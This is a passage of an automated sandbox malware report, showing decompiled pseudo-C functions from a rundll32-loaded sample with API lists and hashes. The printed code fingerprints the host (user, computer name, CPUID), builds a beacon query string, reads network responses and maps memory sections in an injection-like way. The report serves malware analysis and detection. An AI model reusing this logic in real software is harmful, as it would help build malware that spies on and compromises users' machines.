                						 *_t77(_t62, _t47, _t69); // executed
                						E00401B8C(_t62);
                						goto L21;
                					}
                				}
                			}

                APIs
                  • Part of subcall function 00401BA8: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401C2C), ref: 00401BB7
                  • Part of subcall function 00401BA8: GetVersion.KERNEL32 ref: 00401BC6
                  • Part of subcall function 00401BA8: GetCurrentProcessId.KERNEL32 ref: 00401BE2
                  • Part of subcall function 00401BA8: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401BFB
                  • Part of subcall function 00401634: RtlAllocateHeap.NTDLL(00000000,?,00401C48,00000030,746563F0,00000000), ref: 00401640
                • NtQuerySystemInformation.NTDLL ref: 00401C56
                • Sleep.KERNEL32(00000000,00000000,00000030,746563F0,00000000), ref: 00401C9D
                • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 00401CC5
                • GetSystemDefaultUILanguage.KERNEL32 ref: 00401CCF
                • VerLanguageNameA.KERNEL32(?,?,00000004), ref: 00401CE2
                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401D14
                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401D32
                • WaitForSingleObject.KERNEL32(00000000,000000FF,00401490,?,00000000), ref: 00401D63
                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 00401D75
                • CloseHandle.KERNEL32(00000000), ref: 00401D7C
                • GetLastError.KERNEL32(00401490,?,00000000), ref: 00401D84
                • GetLastError.KERNEL32 ref: 00401D95
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: Name$ErrorLanguageLastLongPathProcessSystem$AllocateCloseCodeCreateCurrentDefaultEventExitHandleHeapInfoInformationLocaleObjectOpenQuerySingleSleepThreadVersionWait
                • String ID: @Met`fet MetTet
                • API String ID: 1327471650-3757152079
                • Opcode ID: 36466854d33b217da6cd5bd188e5b16339452aaccaa8ef990bfbf19b79c1f6e2
                • Instruction ID: 2abc78f70f70839a745b78694b816f7735236303e9feb03562aba52f8e45a471
                • Opcode Fuzzy Hash: 36466854d33b217da6cd5bd188e5b16339452aaccaa8ef990bfbf19b79c1f6e2
                • Instruction Fuzzy Hash: 0641D471901615ABEB20EFA59D44AAF7ABCAF44755F104137F901F72E0DB38DE408BA8
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 69%
                			E00402133(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                				intOrPtr _v12;
                				struct _FILETIME* _v16;
                				short _v60;
                				struct _FILETIME* _t14;
                				intOrPtr _t15;
                				long _t18;
                				void* _t19;
                				void* _t22;
                				intOrPtr _t31;
                				long _t32;
                				void* _t34;
                
                				_t31 = __edx;
                				_t14 =  &_v16;
                				GetSystemTimeAsFileTime(_t14);
                				_push(0x192);
                				_push(0x54d38000);
                				_push(_v12);
                				_push(_v16);
                				L004022F0();
                				_push(_t14);
                				_v16 = _t14;
                				_t15 =  *0x4041c4;
                				_push(_t15 + 0x40505e);
                				_push(_t15 + 0x405054);
                				_push(0x16);
                				_push( &_v60);
                				_v12 = _t31;
                				L004022EA();
                				_t18 = _a4;
                				if(_t18 == 0) {
                					_t18 = 0x1000;
                				}
                				_t19 = CreateFileMappingW(0xffffffff, 0x4041c8, 4, 0, _t18,  &_v60); // executed
                				_t34 = _t19;
                				if(_t34 == 0) {
                					_t32 = GetLastError();
                				} else {
                					if(_a4 != 0 || GetLastError() == 0xb7) {
                						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                						if(_t22 == 0) {
                							_t32 = GetLastError();
                							if(_t32 != 0) {
                								goto L9;
                							}
                						} else {
                							 *_a8 = _t34;
                							 *_a12 = _t22;
                							_t32 = 0;
                						}
                					} else {
                						_t32 = 2;
                						L9:
                						CloseHandle(_t34);
                					}
                				}
                				return _t32;
                			}

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401509,0000000A,?,?), ref: 00402140
                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00402156
                • _snwprintf.NTDLL ref: 0040217B
                • CreateFileMappingW.KERNELBASE(000000FF,004041C8,00000004,00000000,?,?), ref: 004021A0
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401509,0000000A,?), ref: 004021B7
                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 004021CB
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401509,0000000A,?), ref: 004021E3
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401509,0000000A), ref: 004021EC
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401509,0000000A,?), ref: 004021F4
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                • String ID: @Met`fet MetTet$`RetAet
                • API String ID: 1724014008-3439188715
                • Opcode ID: ed53cc6cf733dc674b0c403c12d91a41e15459a6f2733fc71b17f5c4fe798c95
                • Instruction ID: a4855123c4efb33c13c183e8f99f0a059a3d0a3c88084186435778c1e7682e09
                • Opcode Fuzzy Hash: ed53cc6cf733dc674b0c403c12d91a41e15459a6f2733fc71b17f5c4fe798c95
                • Instruction Fuzzy Hash: 7A2192B2500108BBDB10EFA4CD88EAF3BADEB48355F104176F715FA2D0D6B49A459B68
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 96%
                			E04B91F55(char __eax, void* __esi) {
                				long _v8;
                				char _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v28;
                				long _t34;
                				signed int _t39;
                				long _t50;
                				char _t59;
                				intOrPtr _t61;
                				void* _t62;
                				void* _t64;
                				char _t65;
                				intOrPtr* _t67;
                				void* _t68;
                				void* _t69;
                
                				_t69 = __esi;
                				_t65 = __eax;
                				_v8 = 0;
                				_v12 = __eax;
                				if(__eax == 0) {
                					_t59 =  *0x4b9a310; // 0xd448b889
                					_v12 = _t59;
                				}
                				_t64 = _t69;
                				E04B954F9( &_v12, _t64);
                				if(_t65 != 0) {
                					 *_t69 =  *_t69 ^  *0x4b9a344 ^ 0x46d76429;
                				} else {
                					GetUserNameW(0,  &_v8); // executed
                					_t50 = _v8;
                					if(_t50 != 0) {
                						_t62 = RtlAllocateHeap( *0x4b9a2d8, 0, _t50 + _t50);
                						if(_t62 != 0) {
                							if(GetUserNameW(_t62,  &_v8) != 0) {
                								_t64 = _t62;
                								 *_t69 =  *_t69 ^ E04B96821(_v8 + _v8, _t64);
                							}
                							HeapFree( *0x4b9a2d8, 0, _t62);
                						}
                					}
                				}
                				_t61 = __imp__;
                				_v8 = _v8 & 0x00000000;
                				GetComputerNameW(0,  &_v8);
                				_t34 = _v8;
                				if(_t34 != 0) {
                					_t68 = RtlAllocateHeap( *0x4b9a2d8, 0, _t34 + _t34);
                					if(_t68 != 0) {
                						if(GetComputerNameW(_t68,  &_v8) != 0) {
                							_t64 = _t68;
                							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04B96821(_v8 + _v8, _t64);
                						}
                						HeapFree( *0x4b9a2d8, 0, _t68);
                					}
                				}
                				asm("cpuid");
                				_t67 =  &_v28;
                				 *_t67 = 1;
                				 *((intOrPtr*)(_t67 + 4)) = _t61;
                				 *((intOrPtr*)(_t67 + 8)) = 0;
                				 *(_t67 + 0xc) = _t64;
                				_t39 = _v16 ^ _v20 ^ _v28;
                				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                				return _t39;
                			}

                APIs
                • GetUserNameW.ADVAPI32(00000000,?), ref: 04B91F8C
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04B91FA3
                • GetUserNameW.ADVAPI32(00000000,?), ref: 04B91FB0
                • HeapFree.KERNEL32(00000000,00000000), ref: 04B91FD1
                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04B91FF8
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04B9200C
                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04B92019
                • HeapFree.KERNEL32(00000000,00000000), ref: 04B92037
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
• Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: HeapName$AllocateComputerFreeUser
                • String ID: Uet
                • API String ID: 3239747167-2766386878
                • Opcode ID: e61272b2e60707d87a6b0439ec25efc09063eedcbc71801f1b345ba6cff6be0b
                • Instruction ID: b81e9680871b73801a4134db98c093b0885b3136495ad2eea511e7ee201fe463
                • Opcode Fuzzy Hash: e61272b2e60707d87a6b0439ec25efc09063eedcbc71801f1b345ba6cff6be0b
                • Instruction Fuzzy Hash: 1431DC71A00209AFEB11DFB9DD81B6EBBF9FB48200F5144BAE505D3250DB74EE05AB60
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 70%
                			E04B95E3A(void* __eax) {
                				long _v8;
                				void* _v12;
                				void* _v16;
                				void _v20;
                				void* __esi;
                				void* _t36;
                				intOrPtr* _t37;
                				intOrPtr* _t39;
                				long _t45;
                				void* _t53;
                				long _t58;
                				void* _t59;
                
                				_t59 = __eax;
                				_t58 = 0;
                				ResetEvent( *(__eax + 0x1c));
                				if(InternetReadFile( *(_t59 + 0x18),  &_v20, 4,  &_v8) != 0) {
                					L5:
                					if(_v8 == 0) {
                						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                						L21:
                						return _t58;
                					}
                					 *0x4b9a174(0, 1,  &_v12); // executed
                					if(0 != 0) {
                						_t58 = 8;
                						goto L21;
                					}
                					_t36 = E04B96601(0x1000);
                					_v16 = _t36;
                					if(_t36 == 0) {
                						_t58 = 8;
                						L18:
                						_t37 = _v12;
                						 *((intOrPtr*)( *_t37 + 8))(_t37);
                						goto L21;
                					}
                					_push(0);
                					_push(_v8);
                					_push( &_v20);
                					while(1) {
                						_t39 = _v12;
                						_t56 =  *_t39;
                						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                						ResetEvent( *(_t59 + 0x1c));
                						if(InternetReadFile( *(_t59 + 0x18), _v16, 0x1000,  &_v8) != 0) {
                							goto L13;
                						}
                						_t58 = GetLastError();
                						if(_t58 != 0x3e5) {
                							L15:
                							E04B94130(_v16);
                							if(_t58 == 0) {
                								_t45 = E04B97ADC(_v12, _t59); // executed
                								_t58 = _t45;
                							}
                							goto L18;
                						}
                						_t58 = E04B9705E( *(_t59 + 0x1c), _t56, 0xffffffff);
                						if(_t58 != 0) {
                							goto L15;
                						}
                						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                						if(_t58 != 0) {
                							goto L15;
                						}
                						L13:
                						_t58 = 0;
                						if(_v8 == 0) {
                							goto L15;
                						}
                						_push(0);
                						_push(_v8);
                						_push(_v16);
                					}
                				}
                				_t58 = GetLastError();
                				if(_t58 != 0x3e5) {
                					L4:
                					if(_t58 != 0) {
                						goto L21;
                					}
                					goto L5;
                				}
                				_t58 = E04B9705E( *(_t59 + 0x1c), _t53, 0xffffffff);
                				if(_t58 != 0) {
                					goto L21;
                				}
                				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                				goto L4;
                			}

                APIs
                • ResetEvent.KERNEL32(?), ref: 04B95E50
                • InternetReadFile.WININET(?,?,00000004,?), ref: 04B95E5F
                • GetLastError.KERNEL32 ref: 04B95E69
                  • Part of subcall function 04B9705E: WaitForMultipleObjects.KERNEL32(00000002,04B97CEC,00000000,04B97CEC,?,?,?,04B97CEC,0000EA60), ref: 04B97079
                • ResetEvent.KERNEL32(?), ref: 04B95EE2
                • InternetReadFile.WININET(?,?,00001000,?), ref: 04B95EF3
                • GetLastError.KERNEL32 ref: 04B95EFD
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
• Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: ErrorEventFileInternetLastReadReset$MultipleObjectsWait
                • String ID: @MetNet
                • API String ID: 3290165071-2109406137
                • Opcode ID: 369b2d6851f657aac339cc50262bf1f935131c83deaf61ca5f8e1ad8fe99f053
                • Instruction ID: 436c70aba5059fea60585ff0936d6d1e3d5e7e74cd9f10884de234431a2250ad
                • Opcode Fuzzy Hash: 369b2d6851f657aac339cc50262bf1f935131c83deaf61ca5f8e1ad8fe99f053
                • Instruction Fuzzy Hash: 44318D33A40608BBDF329FA5CC44BAEB7F9EF88660F2405B8E51597190EA71FD059B10
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 38%
                			E04B96940(char _a4, void* _a8) {
                				void* _v8;
                				void* _v12;
                				char _v16;
                				void* _v20;
                				char _v24;
                				char _v28;
                				char _v32;
                				char _v36;
                				char _v40;
                				void* _v44;
                				void** _t33;
                				void* _t40;
                				void* _t43;
                				void** _t44;
                				intOrPtr* _t47;
                				char _t48;
                
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v20 = _a4;
                				_t48 = 0;
                				_v16 = 0;
                				_a4 = 0;
                				_v44 = 0x18;
                				_v40 = 0;
                				_v32 = 0;
                				_v36 = 0;
                				_v28 = 0;
                				_v24 = 0;
                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                					_t33 =  &_v8;
                					__imp__(_v12, 8, _t33);
                					if(_t33 >= 0) {
                						_t47 = __imp__;
                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                						_t44 = E04B96601(_a4);
                						if(_t44 != 0) {
                							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                							if(_t40 >= 0) {
                								memcpy(_a8,  *_t44, 0x1c);
                								_t48 = 1;
                							}
                							E04B94130(_t44);
                						}
                						NtClose(_v8); // executed
                					}
                					NtClose(_v12);
                				}
                				return _t48;
                			}

                APIs
                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04B96987
                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04B9699A
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04B969B6
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04B969D3
                • memcpy.NTDLL(?,00000000,0000001C), ref: 04B969E0
                • NtClose.NTDLL(?), ref: 04B969F2
                • NtClose.NTDLL(00000000), ref: 04B969FC
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
• Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                • String ID:
                • API String ID: 2575439697-0
                • Opcode ID: 6997555519f22a194f785c1efdd80da2ed71b193a6464e80f33c7a6659ee8626
                • Instruction ID: 7a2712cd09030288a0be50424debfe2bf028fd4590a550d3e506007a78450c19
                • Opcode Fuzzy Hash: 6997555519f22a194f785c1efdd80da2ed71b193a6464e80f33c7a6659ee8626
                • Instruction Fuzzy Hash: 4921E5B2900228BBDF019FA5DD85ADEBFBDEB08740F10406AF905A6210D7719F559BA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E0040154A(intOrPtr* __eax, void** _a4) {
                				int _v12;
                				void* _v16;
                				void* _v20;
                				void* _v24;
                				int _v28;
                				int _v32;
                				intOrPtr _v36;
                				int _v40;
                				int _v44;
                				void* _v48;
                				void* __esi;
                				long _t34;
                				void* _t39;
                				void* _t47;
                				intOrPtr* _t48;
                
                				_t48 = __eax;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v24 =  *((intOrPtr*)(__eax + 4));
                				_v16 = 0;
                				_v12 = 0;
                				_v48 = 0x18;
                				_v44 = 0;
                				_v36 = 0x40;
                				_v40 = 0;
                				_v32 = 0;
                				_v28 = 0;
                				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                				if(_t34 < 0) {
                					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                				} else {
                					 *_t48 = _v16;
                					_t39 = E004015F2(_t48,  &_v12); // executed
                					_t47 = _t39;
                					if(_t47 != 0) {
                						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                					} else {
                						memset(_v12, 0, _v24);
                						 *_a4 = _v12;
                					}
                				}
                				return _t47;
                			}

                Instruction addresses (disassembly column, instruction text not preserved): 0x00401553 0x0040155a 0x0040155b 0x0040155c 0x0040155d 0x0040155e 0x0040156f 0x00401573 0x00401587 0x0040158a 0x0040158d 0x00401594 0x00401597 0x0040159e 0x004015a1 0x004015a4 0x004015a7 0x004015ac 0x004015e7 0x004015ae 0x004015b1 0x004015b7 0x004015bc 0x004015c0 0x004015de 0x004015c2 0x004015c9 0x004015d7 0x004015d7 0x004015c0 0x004015ef

                APIs
                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74654EE0,00000000,00000000,?), ref: 004015A7
                  • Part of subcall function 004015F2: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,004015BC,00000002,00000000,?,?,00000000,?,?,004015BC,00000002), ref: 0040161F
                • memset.NTDLL ref: 004015C9
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: Section$CreateViewmemset
                • String ID: @
                • API String ID: 2533685722-2766056989
                • Opcode ID: 50ebc0e7910a9978d18594c078614fee92139703ade7f927945fe33411ca7c4f
                • Instruction ID: 8f7a861332155e55fc798b9a5ff1eb39cd95682b7b2c8284a926e1e2da6734f8
                • Opcode Fuzzy Hash: 50ebc0e7910a9978d18594c078614fee92139703ade7f927945fe33411ca7c4f
                • Instruction Fuzzy Hash: 02210BB5D00209AFCB11DFA9C8849DEFBF9FB48354F10443AE506F7250D7349A458BA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E004015F2(void** __esi, PVOID* _a4) {
                				long _v8;
                				void* _v12;
                				void* _v16;
                				long _t13;
                
                				_v16 = 0;
                				asm("stosd");
                				_v8 = 0;
                				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                				if(_t13 < 0) {
                					_push(_t13);
                					return __esi[6]();
                				}
                				return 0;
                			}

                Instruction addresses (disassembly column, instruction text not preserved): 0x00401604 0x0040160a 0x00401618 0x0040161f 0x00401624 0x0040162a 0x00000000 0x0040162b 0x00000000

                APIs
                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,004015BC,00000002,00000000,?,?,00000000,?,?,004015BC,00000002), ref: 0040161F
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: SectionView
                • String ID:
                • API String ID: 1323581903-0
                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction ID: aa2898b9334881c296675e76828b4d1ae1dd7b7995b8c31620b7b262b2f1fdab
                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction Fuzzy Hash: 5AF012B590460CBFDB119FA5CC85CAFBBBDEB44354F104D3AF152E10A0D6719E089A60
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 69%
                			E04B96BEF(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
                				intOrPtr _v4;
                				intOrPtr _v8;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				void* _v48;
                				intOrPtr _v56;
                				void* __edi;
                				intOrPtr _t30;
                				void* _t31;
                				intOrPtr _t33;
                				intOrPtr _t34;
                				intOrPtr _t35;
                				intOrPtr _t36;
                				intOrPtr _t37;
                				void* _t40;
                				intOrPtr _t41;
                				int _t44;
                				intOrPtr _t45;
                				int _t48;
                				void* _t49;
                				intOrPtr _t53;
                				intOrPtr _t59;
                				intOrPtr _t63;
                				intOrPtr* _t65;
                				void* _t66;
                				intOrPtr _t71;
                				intOrPtr _t77;
                				intOrPtr _t80;
                				intOrPtr _t83;
                				int _t86;
                				intOrPtr _t88;
                				int _t91;
                				intOrPtr _t93;
                				int _t96;
                				void* _t98;
                				void* _t99;
                				void* _t103;
                				void* _t105;
                				void* _t106;
                				intOrPtr _t107;
                				long _t109;
                				intOrPtr* _t110;
                				intOrPtr* _t111;
                				long _t112;
                				int _t113;
                				void* _t114;
                				void* _t115;
                				void* _t116;
                				void* _t119;
                				void* _t120;
                				void* _t122;
                				void* _t123;
                
                				_t103 = __edx;
                				_t99 = __ecx;
                				_t120 =  &_v16;
                				_t112 = __eax;
                				_t30 =  *0x4b9a3e0; // 0x5109cf0
                				_v4 = _t30;
                				_v8 = 8;
                				_t31 = RtlAllocateHeap( *0x4b9a2d8, 0, 0x800); // executed
                				_t98 = _t31;
                				if(_t98 != 0) {
                					if(_t112 == 0) {
                						_t112 = GetTickCount();
                					}
                					_t33 =  *0x4b9a018; // 0x2e793154
                					asm("bswap eax");
                					_t34 =  *0x4b9a014; // 0x3a87c8cd
                					asm("bswap eax");
                					_t35 =  *0x4b9a010; // 0xd8d2f808
                					asm("bswap eax");
                					_t36 =  *0x4b9a00c; // 0x13d015ef
                					asm("bswap eax");
                					_t37 =  *0x4b9a348; // 0x56d5a8
                					_t3 = _t37 + 0x4b9b62b; // 0x74666f73
                					_t113 = wsprintfA(_t98, _t3, 2, 0x3d18a, _t36, _t35, _t34, _t33,  *0x4b9a02c,  *0x4b9a004, _t112);
                					_t40 = E04B967F4();
                					_t41 =  *0x4b9a348; // 0x56d5a8
                					_t4 = _t41 + 0x4b9b66b; // 0x74707526
                					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
                					_t122 = _t120 + 0x38;
                					_t114 = _t113 + _t44;
                					if(_a12 != 0) {
                						_t93 =  *0x4b9a348; // 0x56d5a8
                						_t8 = _t93 + 0x4b9b676; // 0x732526
                						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
                						_t122 = _t122 + 0xc;
                						_t114 = _t114 + _t96;
                					}
                					_t45 =  *0x4b9a348; // 0x56d5a8
                					_t10 = _t45 + 0x4b9b2de; // 0x74636126
                					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
                					_t123 = _t122 + 0xc;
                					_t115 = _t114 + _t48; // executed
                					_t49 = E04B924C5(_t99); // executed
                					_t105 = _t49;
                					if(_t105 != 0) {
                						_t88 =  *0x4b9a348; // 0x56d5a8
                						_t12 = _t88 + 0x4b9b8c2; // 0x736e6426
                						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
                						_t123 = _t123 + 0xc;
                						_t115 = _t115 + _t91;
                						HeapFree( *0x4b9a2d8, 0, _t105);
                					}
                					_t106 = E04B96173();
                					if(_t106 != 0) {
                						_t83 =  *0x4b9a348; // 0x56d5a8
                						_t14 = _t83 + 0x4b9b8ca; // 0x6f687726
                						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
                						_t123 = _t123 + 0xc;
                						_t115 = _t115 + _t86;
                						HeapFree( *0x4b9a2d8, 0, _t106);
                					}
                					_t107 =  *0x4b9a3cc; // 0x5109600
                					_a20 = E04B96107(0x4b9a00a, _t107 + 4);
                					_t53 =  *0x4b9a36c; // 0x51095b0
                					_t109 = 0;
                					if(_t53 != 0) {
                						_t80 =  *0x4b9a348; // 0x56d5a8
                						_t17 = _t80 + 0x4b9b889; // 0x3d736f26
                						wsprintfA(_t115 + _t98, _t17, _t53);
                					}
                					if(_a20 != _t109) {
                						_t116 = RtlAllocateHeap( *0x4b9a2d8, _t109, 0x800);
                						if(_t116 != _t109) {
                							E04B952F6(GetTickCount());
                							_t59 =  *0x4b9a3cc; // 0x5109600
                							__imp__(_t59 + 0x40);
                							asm("lock xadd [eax], ecx");
                							_t63 =  *0x4b9a3cc; // 0x5109600
                							__imp__(_t63 + 0x40);
                							_t65 =  *0x4b9a3cc; // 0x5109600
                							_t66 = E04B95D8A(1, _t103, _t98,  *_t65); // executed
                							_t119 = _t66;
                							asm("lock xadd [eax], ecx");
                							if(_t119 != _t109) {
                								StrTrimA(_t119, 0x4b99294);
                								_push(_t119);
                								_t71 = E04B927B3();
                								_v20 = _t71;
                								if(_t71 != _t109) {
                									_t110 = __imp__;
                									 *_t110(_t119, _v8);
                									 *_t110(_t116, _v8);
                									_t111 = __imp__;
                									 *_t111(_t116, _v32);
                									 *_t111(_t116, _t119);
                									_t77 = E04B9469F(0xffffffffffffffff, _t116, _v28, _v24); // executed
                									_v56 = _t77;
                									if(_t77 != 0 && _t77 != 0x10d2) {
                										E04B9554C();
                									}
                									HeapFree( *0x4b9a2d8, 0, _v48);
                									_t109 = 0;
                								}
                								RtlFreeHeap( *0x4b9a2d8, _t109, _t119); // executed
                							}
                							RtlFreeHeap( *0x4b9a2d8, _t109, _t116); // executed
                						}
                						HeapFree( *0x4b9a2d8, _t109, _a12);
                					}
                					RtlFreeHeap( *0x4b9a2d8, _t109, _t98); // executed
                				}
                				return _v16;
                			}

